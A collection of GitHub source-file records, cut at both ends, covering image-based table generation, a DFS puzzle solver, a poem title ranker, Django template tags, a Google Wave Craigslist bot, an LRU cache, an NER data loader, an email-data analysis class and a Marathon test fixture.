image_font.getsize(\" \")[1] * 1\n words_width = [image_font.getsize(w)[0] for w in words]\n text_width = sum(words_width) + int(space_width) * (len(words) - 1)\n text_height = 
max([image_font.getsize(w)[1] for w in words])\n\n txt_draw = ImageDraw.Draw(img)\n colors = [ImageColor.getrgb(c) for c in text_color.split(\",\")]\n c1, c2 = colors[0], colors[-1]\n\n fill = (\n random.randint(min(c1[0], c2[0]), max(c1[0], c2[0])),\n random.randint(min(c1[1], c2[1]), max(c1[1], c2[1])),\n random.randint(min(c1[2], c2[2]), max(c1[2], c2[2])),\n )\n if align == 'right':\n xmin = xmax - text_width\n for i, w in enumerate(words):\n start_x = sum(words_width[0:i]) + i * int(space_width) + xmin\n start_y = 0 + ymin\n if start_x + words_width[i] > xmax:\n break\n txt_draw.text(\n (start_x, start_y),\n w,\n fill=fill,\n font=image_font,\n )\n\n img = np.array(img)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n return img\n\n\ndef generate_date_data():\n ngay = random.randint(1, 31)\n thang = random.randint(1, 12)\n nam = random.randint(2000, 2050)\n return f\"{ngay}/{thang}/{nam}\"\n\n\ndef generate_tien(n):\n m = [str(random.randint(0, 9)) for _ in range(n)]\n m_ = [''.join(m[i:i + 3]) for i in range(0, n, 3)]\n s = '.'.join(m_)[::-1]\n return s\n\n\nwith open(\"/home/andn/PycharmProjects/TextRecognitionDataGenerator/texts/VNESEcorpus_5.txt\") as f:\n lines = f.readlines()\n\n\ndef generate_string(n):\n line = random.choice(lines)\n words = line.split()\n if len(words) < n:\n return line\n start = random.randint(0, len(words) - n)\n return ' '.join(words[start:start + n])\n\n\ndef map_pixel_to_size(pixel):\n # NB: pixel keys 21, 31 and 41 appear twice below; Python keeps the later value, so the earlier sizes (18, 27 and 36) are dead entries\n a = {11: 10, 12: 11, 14: 12, 15: 13, 16: 14, 17: 15, 18: 16, 20: 17, 21: 18, 21: 19, 22: 20, 23: 21, 25: 22,\n 26: 23, 27: 24, 28: 25, 30: 26, 31: 27, 31: 28, 32: 29, 34: 30, 35: 31, 36: 32, 37: 33, 38: 34, 40: 35, 41: 36,\n 41: 37, 42: 38, 43: 39}\n\n while pixel not in a:\n pixel += 1\n\n return a[pixel]\n\n\nif __name__ == '__main__':\n show_img(Table().draw(200))\n# img = np.zeros((500, 500, 3), dtype=np.uint8) + 255\n# fonts = ['font/times.ttf', 'font/timesbd.ttf', 'font/timesi.ttf', 'font/timesbi.ttf']\n# draw_text(text=\"Đào Ngọc An\", font=fonts[0], align='center', size=48, xmin=200, ymin=200, xmax=500, ymax=500, img=img,\n# text_color='#000000,#282828').show()\n\n# regular, italic, bold, bold italic\n#\n","repo_name":"DaoNgocAn/table_detection","sub_path":"generate_table.py","file_name":"generate_table.py","file_ext":"py","file_size_in_byte":14004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25457100537","text":"import sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(heightRoot, widthRoot, board):\n global result\n\n visitList[heightRoot][widthRoot] = True\n\n if not result:\n for i in range(2):\n subHeight = (heightRoot + (down[i]*board[heightRoot][widthRoot]))\n subWidth = (widthRoot + (right[i]*board[heightRoot][widthRoot]))\n \n if 0 <= subHeight < length and 0 <= subWidth < length:\n if not visitList[subHeight][subWidth]:\n if board[subHeight][subWidth] == -1:\n result = True\n return\n else:\n dfs(subHeight, subWidth, board)\n else:\n continue # out of bounds in this direction; still try the other move\n\nresult = False\ndown = [1,0]\nright = [0,1]\n\nlength = int(sys.stdin.readline())\nboard = []\nvisitList = [[False for i in range(length)] for i in range(length)]\nfor i in range(length):\n board.append(list(map(int, (sys.stdin.readline()).split())))\n\ndfs(0, 0, board)\n\nif result:\n sys.stdout.write(\"HaruHaru\")\nelse:\n 
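# the DFS never reached a -1 goal cell\n 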
sys.stdout.write(\"Hing\")\n\n","repo_name":"jy940408/algorithm_python","sub_path":"PYTHONDepthFirstSearch/점프왕쩰리.py","file_name":"점프왕쩰리.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1825345536","text":"# Write a Python program to find whether a given number (accept from the user) is even or odd, print out an appropriate message to the user.\n\ndef even_odd(num):\n if abs(num) % 2 == 0:\n return \"The number is even.\"\n else:\n return \"The number is odd.\"\n\nnum = int(input(\"Please enter a number : \"))\nprint(even_odd(num))","repo_name":"hasanyucel/PythonProjects","sub_path":"Applications/Basics/Basic-021.py","file_name":"Basic-021.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70194195254","text":"import ast\n\nimport numpy as np\nimport re\nimport string\nfrom pymorphy2 import MorphAnalyzer\n\n\ndef create_adj_matrix(poem):\n lines_vocab, poem_vocab = create_vocabularies(poem)\n p_size = len(lines_vocab)\n adj_matrix = np.zeros((p_size, p_size))\n for line_1 in range(p_size):\n vocab1 = lines_vocab[line_1]\n for line_2 in range(p_size):\n if line_1 != line_2:\n vocab2 = lines_vocab[line_2]\n similarity = compute_cosine_similarity(vocab1, vocab2, poem_vocab)\n adj_matrix[line_1, line_2] = similarity\n return adj_matrix\n\n\ndef compute_lines_degrees(adj_matrix):\n size = len(adj_matrix)\n edges = np.zeros(size, int)\n for i in range(size):\n for j in range(size):\n if i != j and adj_matrix[i, j] > 0:\n edges[i] += 1\n return list(edges)\n\n\ndef compute_cosine_similarity(vocab1, vocab2, poem_vocab):\n words1 = vocab1.keys()\n words2 = vocab2.keys()\n common_words = list(words1 & words2)\n if not common_words:\n return 0.\n numerator = 0.\n for i in range(len(common_words)):\n tf_line1 = vocab1.get(common_words[i])\n tf_line2 = vocab2.get(common_words[i])\n idf = poem_vocab.get(common_words[i]) - 0.85*tf_line1 - 0.85*tf_line2\n numerator += tf_line1 * tf_line2 * np.power(idf, 2)\n tf_sum1 = 0.\n tf_sum2 = 0.\n for w in words1:\n tf = vocab1.get(w)\n idf = poem_vocab.get(w) - tf\n tf_sum1 += tf * idf\n for w in words2:\n tf = vocab2.get(w)\n idf = poem_vocab.get(w) - tf\n tf_sum2 += tf * idf\n denominator = np.sqrt(tf_sum1)*np.sqrt(tf_sum2)\n return numerator if denominator == 0. 
else numerator/denominator\n\n\ndef generate_title(poem):\n poem = ast.literal_eval(poem)\n matrix = create_adj_matrix(poem)\n degrees = compute_lines_degrees(matrix)\n line_prob = sum([line for line in matrix]) * degrees\n indexed_prob = np.array([[i, lst] for i, lst in enumerate(line_prob)])\n sorted_ind = indexed_prob[:, 1].argsort()\n size = len(sorted_ind)\n title_ind = sorted_ind[size-1] if sorted_ind[0] != 0 else sorted_ind[size-2]\n return poem[title_ind]\n\n\ndef generate_title_with_probabilities(poem):\n poem = make_one_line(poem)\n words = list(map(lambda x: x.lower(), get_line_words(poem)))\n ngramms = split_to_ngramms(words, 2)\n matrix = create_adj_matrix(ngramms)\n degrees = compute_lines_degrees(matrix)\n line_sum = sum([line for line in matrix])\n print(\"l_sum \", line_sum)\n line_prob = []\n for i, line in enumerate(line_sum):\n el = line if degrees[i] == 0 else line/(2*degrees[i])\n if el > 0:\n line_prob.append(el)\n indexed_prob = np.array([[i, lst] for i, lst in enumerate(line_prob)])\n print(\"ind_pr \", indexed_prob)\n sorted_ind = indexed_prob[:, 1].argsort()\n lines_with_prob = []\n size = len(sorted_ind)\n start_ind = size - 6 if size > 6 else 0\n for i in range(start_ind, size):\n ind = sorted_ind[i]\n lines_with_prob.append([ngramms[ind], indexed_prob[ind, 1]])\n return lines_with_prob\n\n\nmorph = MorphAnalyzer()\n\n\ndef create_vocabularies(poem):\n poem_vocab = {}\n lines_vocab = []\n closest_nouns = {'femn': '', 'masc': '', 'neut': ''}\n for i in range(len(poem)):\n line = get_line_words(poem[i])\n if len(line) != 0:\n line_vocab = {}\n for word in line:\n parsed = morph.parse(word)[0]\n lemma = parsed.normal_form\n pos = str(parsed.tag)\n poem_vocab = change_poem_vocab(poem_vocab, lemma, pos, closest_nouns)\n line_vocab = change_line_vocab(line_vocab, lemma, pos, closest_nouns)\n lines_vocab.append(line_vocab)\n return lines_vocab, poem_vocab\n\n\ndef get_line_words(line):\n word = \"\"\n words = []\n for i, char in enumerate(line):\n if char in \" -\" and word != \"\":\n words.append(word)\n word = \"\"\n elif (char in \" -\\n\" and word == \"\") or (char in \"«»…\"):\n continue\n elif char not in string.punctuation:\n word += char\n return words\n\n\ndef change_line_vocab(line_vocab, lemma, pos, closest_nouns):\n if lemma in line_vocab:\n line_vocab[lemma] += 1\n else:\n changed = False\n if re.match(r'NPRO(.*),3per(.*)sing', pos):\n lemma, changed = update_noun_count(closest_nouns, pos, lemma)\n if not changed and not (re.match(r'(PRCL|PREP|CONJ|PNCT)', pos)):\n line_vocab[lemma] = 1\n\n if changed:\n if lemma in line_vocab:\n line_vocab[lemma] += 1\n return line_vocab\n\n\ndef change_poem_vocab(poem_vocab, lemma, pos, closest_nouns):\n if lemma in poem_vocab:\n poem_vocab[lemma] += 1\n else:\n changed = False\n if re.match(r'NOUN', pos):\n closest_nouns = change_closest_noun(closest_nouns, pos, lemma)\n elif re.match(r'NPRO(.*),3per(.*)sing', pos):\n lemma, changed = update_noun_count(closest_nouns, pos, lemma)\n\n if not changed and not (re.match(r'PRCL|PREP|CONJ|PNCT', pos)):\n poem_vocab[lemma] = 1\n elif changed and lemma in poem_vocab:\n poem_vocab[lemma] += 1\n return poem_vocab\n\n\ndef change_closest_noun(closest_nouns, analysis, lemma):\n for gender in closest_nouns.keys():\n if re.search(gender, analysis):\n closest_nouns[gender] = lemma\n return closest_nouns\n\n\ndef update_noun_count(closest_nouns, analysis, lemma):\n for gender in closest_nouns.keys():\n if re.search(gender, analysis):\n if closest_nouns.get(gender) == '':\n return 
lemma, False\n else:\n return closest_nouns.get(gender), True\n return lemma, False # fallback: the analysis matched no known gender, so keep the pronoun unchanged\n\n\ndef split_to_ngramms(words, n):\n forbidden = re.compile(r\"PRCL|PREP|CONJ|PNCT\")\n filtered = [w for w in words if not re.search(forbidden, str(morph.parse(w)[0].tag))]\n if n == 1:\n return filtered\n if n > 1:\n ngrams = zip(*[filtered[i:] for i in range(n)])\n ngrams = [' '.join(ngram) for ngram in ngrams]\n return ngrams\n\n\ndef get_one_line_words(line):\n word = \"\"\n for char in line:\n if not(char in string.punctuation) and not(char in \"-«»…\"):\n word += char.lower()\n words = re.split(r' ', word)\n return words\n\n\ndef make_one_line(poem):\n res = re.split(r'\\\\n', poem)\n result = \"\"\n for i, r in enumerate(res):\n if len(r) == 0:\n continue\n elif i != len(res) - 1:\n result += (r + ' ')\n else:\n result += r\n return result\n","repo_name":"hellagod/poem_analyzer","sub_path":"modules/code/lex_rank.py","file_name":"lex_rank.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7827989084","text":"# coding=utf-8\nfrom __future__ import absolute_import\nimport datetime\nfrom django import template\nfrom person.models import Person\n\nregister = template.Library()\n\n\ndef my_sort(value):\n list1 = str(value).split(' ')\n list1.sort(key=lambda x:x[0])\n new_list = []\n while len(list1) != 0:\n new_list.append(list1[0] + ' ' + list1[1])\n del list1[0:2]\n new_list.sort(key=lambda x:x[0])\n for i in new_list:\n return i\n\n\nregister.filter('my_sort', my_sort)\n\n\n\n# @register.filter(expects_localtime=True)\n# def test(value):\n# return value\n#\n# @register.simple_tag(takes_context=True)\n# def current_time(context, f, prefix=None):\n# prefix = prefix or context.get('date_prefix', '')\n# context['t'] = Person.objects.get(pk=1)\n# return prefix + datetime.datetime.now().strftime(f)\n#\n# @register.inclusion_tag('shop/menu.html', takes_context=True)\n# def menu(context, selected=None):\n# return {\n# 'items': ['Menu 1', 'Menu 2', 'Menu 3'],\n# 'selected': selected or context.get('selected_menu')\n# }\n@register.inclusion_tag('shop/show_messages.html', takes_context=True)\ndef show_messages(context, message=True):\n return {\n 'messages': (context.get('messages') if message else None)}\n\n\n","repo_name":"vova1995/SECL_Project","sub_path":"netshop/shop/templatetags/shoptags.py","file_name":"shoptags.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6690926084","text":"from waveapi import events\nfrom waveapi import model\nfrom waveapi import robot\nfrom waveapi import document\n\nimport logging\nimport re\nimport craigslistStorage\nimport craigslistParser\n\ncraigslistLinkPattern = re.compile('http://[\\\\w\\\\.]+\\\\.craigslist\\\\.(org|ca)/[\\\\w/?=&+%]+')\n\ndef OnRobotAdded(properties, context):\n root_wavelet = context.GetRootWavelet()\n waveID = root_wavelet.GetId()\n \n logging.debug('Bot added to wave #%s' % waveID)\n\n root_wavelet.CreateBlip().GetDocument().SetText(\"\"\"Thanks for adding me !\n\nTo use me, simply add a URL to a result list on Craigslist in your first message.\n\nPlease note that it may take a few seconds before the first results are added to the wave.\n\nBecause of limitations/bugs of the Wave API, HTML content is not properly displayed, and new results are not automatically added to the wave. 
These features are ready on my side and should (hopefully) be implemented soon.\"\"\")\n\n\ndef OnBlipSubmitted(properties, context):\n rootWavelet = context.GetRootWavelet()\n waveID = rootWavelet.GetWaveId()\n waveletID = rootWavelet.GetId()\n\n # we try to see if a craigslist url is already associated with this wave\n wave = craigslistStorage.GetWave(waveID)\n\n # if not, we look for that URL in the root blip\n if wave is None:\n logging.debug('No url associated with wave #%s' % waveID)\n \n rootBlipId = rootWavelet.GetRootBlipId()\n rootBlip = context.GetBlipById(rootBlipId)\n doc = rootBlip.GetDocument()\n \n url = craigslistLinkPattern.search(doc.GetText())\n\n # if the url is found, store it\n if url is not None:\n searchUrl = url.group(0)\n logging.debug('URL found : %s' % searchUrl)\n\n wave = craigslistStorage.AddWave(waveID, waveletID, searchUrl)\n rootWavelet.CreateBlip().GetDocument().SetText('I found a URL ! I will now monitor %s and add search results to this wave !' % searchUrl)\n else:\n logging.debug('URL not found in root blip. Aborting...')\n return\n\n # now that we have the URL, let's fetch the result\n CraigslistWaveUpdater(context, wave)\n\nclass CraigslistWaveUpdater:\n def __init__(self, context, wave):\n \"\"\" Initiates a robot that will update the search results of the given craigslist wave \"\"\"\n self.wave = wave\n self.googleWave = context.GetWaveById(wave.waveID)\n self.wavelet = context.GetWaveletById(wave.waveletID)\n self.UpdateResults()\n\n def UpdateResults(self):\n \"\"\" Parses the search results webpage to look for new items \"\"\"\n logging.debug('Updating results for wave %s' % self.wave.waveID)\n \n # let's get the results we already have for this wave\n knownItems = craigslistStorage.GetWaveItemUrls(self.wave)\n\n # now, parse search results and look for new ones\n craigslistParser.ResultsList(self.wave.searchUrl, knownItems, self.NewResultItemFound)\n\n def NewResultItemFound(self, item):\n \"\"\" This method is called by the parser each time a new item is found \"\"\"\n logging.debug('Adding new item %s to wave %s' % (item.url, self.wave.waveID))\n\n # add the item to the list of items of the wave\n craigslistStorage.AddResultItem(self.wave, item.url)\n\n # create a new blip with the item details\n doc = self.wavelet.CreateBlip().GetDocument()\n\n doc.AppendText('%s\\\\n\\\\n' % item.url)\n doc.AppendText('%s (%s)\\\\n\\\\n' % (item.title, item.location))\n doc.AppendText('Date: %s\\\\nReply to: %s\\\\n\\\\n' % (item.date, item.email))\n doc.AppendText(item.text + '\\\\n')\n\n for url in item.imageURLs:\n doc.AppendText('\\\\n')\n doc.AppendElement(document.Image(url=url))\n\n\nif __name__ == '__main__':\n myRobot = robot.Robot('Craigslist Searchy',\n image_url='http://craigslist-searchy.appspot.com/assets/images/logo.png',\n version='1.1.7',\n profile_url='http://craigslist-searchy.appspot.com/')\n myRobot.RegisterHandler(events.BLIP_SUBMITTED, OnBlipSubmitted)\n myRobot.RegisterHandler(events.WAVELET_SELF_ADDED, OnRobotAdded)\n# myRobot.RegisterCronJob('/update', 60)\n myRobot.Run()\n","repo_name":"Wookai/craigslist-searchy","sub_path":"craigslistRobot.py","file_name":"craigslistRobot.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2603404000","text":"# -*- coding: utf-8 -*-\n# author = \"Louis\"\n\n\nclass DLinkedNode:\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.pre = None\n self.next = None\n\n\nclass 
LRUCache:\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.cache = {}\n self.head = DLinkedNode(None, None)\n self.tail = DLinkedNode(None, None)\n self.head.next = self.tail\n self.tail.pre = self.head\n\n def get(self, key):\n if key in self.cache:\n node = self.cache[key]\n self.moveNodeToFirst(node)\n return node.value\n return -1\n\n def put(self, key, value):\n if key in self.cache:\n node = self.cache[key]\n node.value = value\n self.moveNodeToFirst(node)\n else:\n node = DLinkedNode(key, value)\n self.cache[key] = node\n if self.capacity > 0:\n self.capacity -= 1\n else:\n mv_node = self.removeLastNode()\n self.cache.pop(mv_node.key)\n self.addNodeToFirst(node)\n\n def moveNodeToFirst(self, node):\n\n self.removeNode(node)\n self.addNodeToFirst(node)\n\n def addNodeToFirst(self, node):\n node.next = self.head.next\n node.pre = self.head\n self.head.next.pre = node\n self.head.next = node\n\n def removeNode(self, node):\n node.next.pre = node.pre\n node.pre.next = node.next\n # self.clearNode(node)\n\n def removeLastNode(self):\n node = self.tail.pre\n self.removeNode(node)\n return node\n # key = mv_node.key\n\n # mv_node.pre.next = self.tail\n # self.tail.pre = mv_node.pre\n # self.clearNode(mv_node)\n # self.cache.pop(key)\n\n # def clearNode(self, node):\n # node.next = None\n # node.pre = None\n\nif __name__ == '__main__':\n c = LRUCache(2)\n c.put(1,1)\n print(c.get(1))\n c.put(2,2)\n print(c.get(2))\n print(c.get(1))\n c.put(3,3)\n print(c.get(2))\n print(c.get(1))\n print(c.get(3))\n print(c.get(4))\n\n\n# import collections\n# class LRUCache:\n\n# def __init__(self, capacity: int):\n# self.capacity = capacity\n# self.dic = collections.OrderedDict()\n\n# def get(self, key: int) -> int:\n# if key in self.dic:\n# value = self.dic.pop(key)\n# self.dic[key] = value\n# return value\n# else:\n# return -1\n\n# def put(self, key: int, value: int) -> None:\n# if key in self.dic:\n# self.dic.pop(key)\n\n# else:\n# if self.capacity > 0:\n# self.capacity -= 1\n# else:\n# self.dic.popitem(False)\n# self.dic[key] = value\n\n\n# Your LRUCache object will be instantiated and called as such:\n# obj = LRUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)\n\n\n","repo_name":"LouisU/practice","sub_path":"leetcode/146.py","file_name":"146.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2834426584","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport numpy as np\nimport os\n\nbase_dir = 'data'\nstopwords_dir = os.path.join(base_dir, 'stop_words.txt')\n\n\ndef open_file(filename, mode='r'):\n return open(filename, mode, encoding='utf-8', errors='ignore')\n\n\ndef read_file(filename):\n contents = []\n with open_file(filename) as f:\n for line in f:\n try:\n conts = re.split('\\\\s+', line.strip())\n contents.append(conts)\n except:\n print(line)\n return contents\n\n\ndef stopwords_list(filename):\n stopwords = []\n with open_file(filename) as f:\n for line in f:\n try:\n content = line.strip()\n stopwords.append(content)\n except:\n pass\n return stopwords\n\n\nstopwords = stopwords_list(stopwords_dir)\n\n\ndef remove_stopwords(content):\n return list(set(content).difference(set(stopwords)))\n\n\ndef word2features(words, i):\n # TODO: word n-gram features could also be extracted\n word = words[i]\n\n features = {\n 'bias': 1.0,\n 'word.lower()': word.lower(), # the current word\n # 'word[-3:]': word[-3:],\n # 'word[-2:]': word[-2:],\n # 'word.isupper()': word.isupper(),\n # 'word.istitle()': 
word.istitle(),\n 'word.isdigit()': word.isdigit(),\n # 'postag': postag,\n # 'postag[:2]': postag[:2],\n }\n if i > 0:\n word1 = words[i-1]\n features.update({\n '-1:word.lower()': word1.lower(), # the word before the current one\n # '-1:word.istitle()': word1.istitle(),\n # '-1:word.isupper()': word1.isupper(),\n # '-1:postag': postag1,\n # '-1:postag[:2]': postag1[:2],\n })\n else:\n features['BOS'] = True\n\n if i < len(words)-1:\n word1 = words[i+1]\n features.update({\n '+1:word.lower()': word1.lower(), # the word after the current one\n # '+1:word.istitle()': word1.istitle(),\n # '+1:word.isupper()': word1.isupper(),\n # '+1:postag': postag1,\n # '+1:postag[:2]': postag1[:2],\n })\n else:\n features['EOS'] = True\n\n return features\n\n\ndef process_crf_file(crf_train_source_dir, crf_train_target_dir):\n features = []\n labels = []\n with open_file(crf_train_source_dir) as f:\n for line in f:\n feature = []\n words = re.split('\\\\s+', line.strip())\n for i in range(len(words)):\n feature.append(word2features(words, i))\n features.append(feature)\n\n with open_file(crf_train_target_dir) as f:\n for line in f:\n label = []\n ls = re.split('\\\\s+', line.strip())\n for i in range(len(ls)):\n label.append(ls[i])\n labels.append(label)\n\n return np.array(features), np.array(labels)\n\n\ndef build_vocab(total_dir, vocab_dir):\n \"\"\"Build the vocabulary from the training set and save it\"\"\"\n print(\"building vocab...\")\n final_words = [\"Padding\", \"Unknown\"]\n with open_file(total_dir) as f:\n for line in f:\n conts = re.split('\\\\s+', line.strip())\n for con in conts:\n final_words.append(con)\n open_file(vocab_dir, mode='w').write('\\\\n'.join(set(final_words)) + '\\\\n')\n\n\ndef read_vocab(vocab_dir):\n \"\"\"Read the vocabulary file\"\"\"\n words = open_file(vocab_dir).read().strip().split('\\\\n')\n word_to_id = dict(zip(words, range(len(words))))\n return words, word_to_id\n\n\ndef read_category(target_dir):\n cates = ['Padding']\n with open_file(target_dir) as f:\n for line in f:\n cates.extend(re.split('\\\\s+', line.strip()))\n categories = list(set(cates))\n cat_to_id = dict(zip(categories, range(len(categories))))\n return categories, cat_to_id\n\n\ndef pad_sequences(sequences,\n maxlen=None,\n dtype='int32',\n padding='post',\n truncating='post',\n value=0.):\n if not hasattr(sequences, '__len__'):\n raise ValueError('`sequences` must be iterable.')\n lengths = []\n for x in sequences:\n if not hasattr(x, '__len__'):\n raise ValueError('`sequences` must be a list of iterables. 
'\n 'Found non-iterable: ' + str(x))\n lengths.append(len(x))\n\n num_samples = len(sequences)\n if maxlen is None:\n maxlen = np.max(lengths)\n\n # take the sample shape from the first non empty sequence\n # checking for consistency in the main loop below.\n sample_shape = tuple()\n for s in sequences:\n if len(s) > 0: # pylint: disable=g-explicit-length-test\n sample_shape = np.asarray(s).shape[1:]\n break\n\n x = (np.ones((num_samples, maxlen) + sample_shape) * value).astype(dtype)\n for idx, s in enumerate(sequences):\n if not len(s): # pylint: disable=g-explicit-length-test\n continue # empty list/array was found\n if truncating == 'pre':\n trunc = s[-maxlen:] # pylint: disable=invalid-unary-operand-type\n elif truncating == 'post':\n trunc = s[:maxlen]\n else:\n raise ValueError('Truncating type \"%s\" not understood' % truncating)\n\n # check `trunc` has expected shape\n trunc = np.asarray(trunc, dtype=dtype)\n if trunc.shape[1:] != sample_shape:\n raise ValueError(\n 'Shape of sample %s of sequence at position %s is different from '\n 'expected shape %s'\n % (trunc.shape[1:], idx, sample_shape))\n\n if padding == 'post':\n x[idx, :len(trunc)] = trunc\n elif padding == 'pre':\n x[idx, -len(trunc):] = trunc\n else:\n raise ValueError('Padding type \"%s\" not understood' % padding)\n return x\n\n\ndef process_nn_crf_source_file(source_total_dir, word_to_id, seq_length):\n \"\"\"Convert the file contents to id representation\"\"\"\n contents = read_file(source_total_dir)\n len_ = len(contents)\n len_texts = []\n\n data_id = []\n for i in range(len_):\n data_id_in_text = []\n for x in contents[i]:\n if x in word_to_id:\n data_id_in_text.append(word_to_id[x])\n else:\n data_id_in_text.append(word_to_id['Unknown'])\n data_id.append(data_id_in_text)\n\n if len(data_id_in_text) >= seq_length:\n len_texts.append(seq_length)\n else:\n len_texts.append(len(data_id_in_text))\n\n x_pad = pad_sequences(data_id, seq_length, value=word_to_id['Padding'])\n\n return x_pad, len_texts\n\n\ndef process_nn_crf_target_file(target_total_dir, cat_to_id, seq_length):\n tags = read_file(target_total_dir)\n tag_id = []\n for i in range(len(tags)):\n tag_id_in_text = []\n for y in tags[i]:\n tag_id_in_text.append(cat_to_id[y])\n tag_id.append(tag_id_in_text)\n y_pad = pad_sequences(tag_id, seq_length, value=cat_to_id['Padding'])\n\n return y_pad\n\n\ndef batch_iter(x, y, len_, batch_size=64):\n \"\"\"Generate batches of data\"\"\"\n data_len = len(x)\n num_batch = int((data_len - 1) / batch_size) + 1\n\n indices = np.random.permutation(np.arange(data_len))\n x_shuffle = []\n y_shuffle = []\n len_shuffle = []\n for i in range(len(indices)):\n x_shuffle.append(x[indices[i]])\n y_shuffle.append(y[indices[i]])\n len_shuffle.append(len_[indices[i]])\n\n for i in range(num_batch):\n start_id = i * batch_size\n end_id = min((i + 1) * batch_size, data_len)\n yield x_shuffle[start_id:end_id], y_shuffle[start_id:end_id], len_shuffle[start_id:end_id]\n","repo_name":"qianshuang/NER","sub_path":"data/cnews_loader.py","file_name":"cnews_loader.py","file_ext":"py","file_size_in_byte":7588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72775004854","text":"# Problem: https://www.acmicpc.net/problem/11399\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input().strip())\narr = sorted(list(map(int, input().split())))\nres = 0\n\nfor i in range(0,len(arr)):\n #print(arr[:i+1])\n 
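# person i waits for the prefix sum arr[0]+...+arr[i]; sorting ascending minimises the total\n 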
res+=sum(arr[:i+1])\n\n\nprint(res)","repo_name":"JangAyeon/Algorithm","sub_path":"백준/11399.py","file_name":"11399.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72533828534","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nimport seaborn\nimport pandas as pd\n\nfrom helper_functions import *\n\nclass emailData():\n def __init__(self, df):\n \n if df.columns.values[0] == 'time':\n self.transformed_df = df\n \n else:\n self.transformed_df = self._reformat_dataframe(df)\n \n \n self.all_names, self.senders, self.receivers, self.individual_emails = self.get_all_name_list(self.transformed_df)\n self.counts_df = self.name_aggregate_counts(self.transformed_df)\n self.prolific_senders = self.get_prolific_senders(15)\n self.current_time_ag = [self.transformed_df]\n \n def _reformat_dataframe(self, df):\n '''This function takes in the original dataframe and puts it into a more usable format \n (what I call a transformed dataframe). Time is in days.'''\n headers = ['time', 'messageid', 'sender', 'recipients', 'topic', 'mode']\n df.columns = headers\n df.drop(['topic', 'mode'], axis = 1, inplace = True)\n df.recipients = df.recipients.astype(str)\n df.recipients = df.recipients.apply(split_emails)\n df.time = (df.time - df.time.min())/(1000*60*60*24)\n \n return df\n \n def get_all_name_list(self, df):\n '''This function takes in a transformed dataframe and returns a list of all names as well as just sender and recipients.\n Also the original df has multiple recipients in one row so I make a list of the form [[sender, receiver1], [sender, receiver2]]'''\n \n sender_names = df.sender.values\n recipient_lists = df.recipients.values\n\n individual_emails = np.array([[sender_names[i], recipi] for i in xrange(len(recipient_lists)) for recipi in recipient_lists[i]])\n \n sender_names = list(set(sender_names))\n recipient_names = list(set([item for sublist in recipient_lists for item in sublist]))\n \n return list(set(sender_names + recipient_names)), sender_names, recipient_names, individual_emails\n \n def name_aggregate_counts(self, df):\n ''' Here I'm doing counts grouped by name. 
(hence name_aggregate)'''\n sender_names = list(df.sender.values)\n recipient_lists = df.recipients.values\n\n recipient_names = [item for sublist in recipient_lists for item in sublist]\n \n recipient_series = pd.Series(recipient_names)\n recp_counts = recipient_series.value_counts()\n send_counts = df.sender.value_counts()\n \n countdf = pd.DataFrame(self.all_names, columns = ['person'], index = self.all_names)\n \n countdf['sent'] = send_counts\n countdf['received'] = recp_counts\n countdf.names = countdf.person.astype(str)\n countdf = countdf.fillna(0)\n\n countdf.sent = countdf.sent.astype(int)\n countdf.received = countdf.received.astype(int)\n \n countdf.sort_values('sent', ascending=False, inplace=True)\n return countdf\n \n def time_aggregate(self, start_date, end_date, num_days):\n ''' Here I partition a transformed data frame between start_date (in days) and end_date (in days).\n num_days is the number of days that is in each partition'''\n num_partitions = np.ceil((end_date - start_date)/num_days) + 1\n\n df = start_end_sep(self.transformed_df, start_date, end_date)\n\n times = np.linspace(start_date, end_date, num_partitions)\n sub_data = [start_end_sep(df, times[i], times[i+1]) for i in xrange(len(times)-1)]\n\n self.current_time_ag = sub_data\n return sub_data\n \n def name_time_aggregate(self, start_date, end_date, num_days):\n ''' This combines the last two functions an breaks down the df into other dfs by time\n and then performs sent-received counts on each of those dfs.'''\n sub_data = self.time_aggregate(start_date, end_date, num_days)\n return [self.name_aggregate_counts(data) for data in sub_data]\n\n def get_prolific_senders(self, num_std):\n ''' The class has a method to get prolific senders based on whether they emailed some number of standard deviations\n above the mean'''\n std_sent = self.counts_df.sent.std()\n mean_sent = self.counts_df.sent.mean()\n return self.counts_df.person[self.counts_df.sent > num_std*std_sent + mean_sent].values","repo_name":"lisamnash/data_practice","sub_path":"Enron_email_data/emailData.py","file_name":"emailData.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32174181175","text":"from __future__ import print_function, absolute_import, division\n\nimport os\nimport time\nimport pytest\n\nfrom epos.marathon import marathon, destroy, deployments, app, apps\nfrom satyr.utils import timeout\n\n\nhost = os.environ.get('MARATHON_HOST')\npytestmark = pytest.mark.skipif(\n not host, reason=\"MARATHON_HOST environment variable must be set\")\n\n\n@pytest.yield_fixture(autouse=True)\ndef destroy_apps():\n try:\n yield\n finally:\n for a in apps(host=host):\n 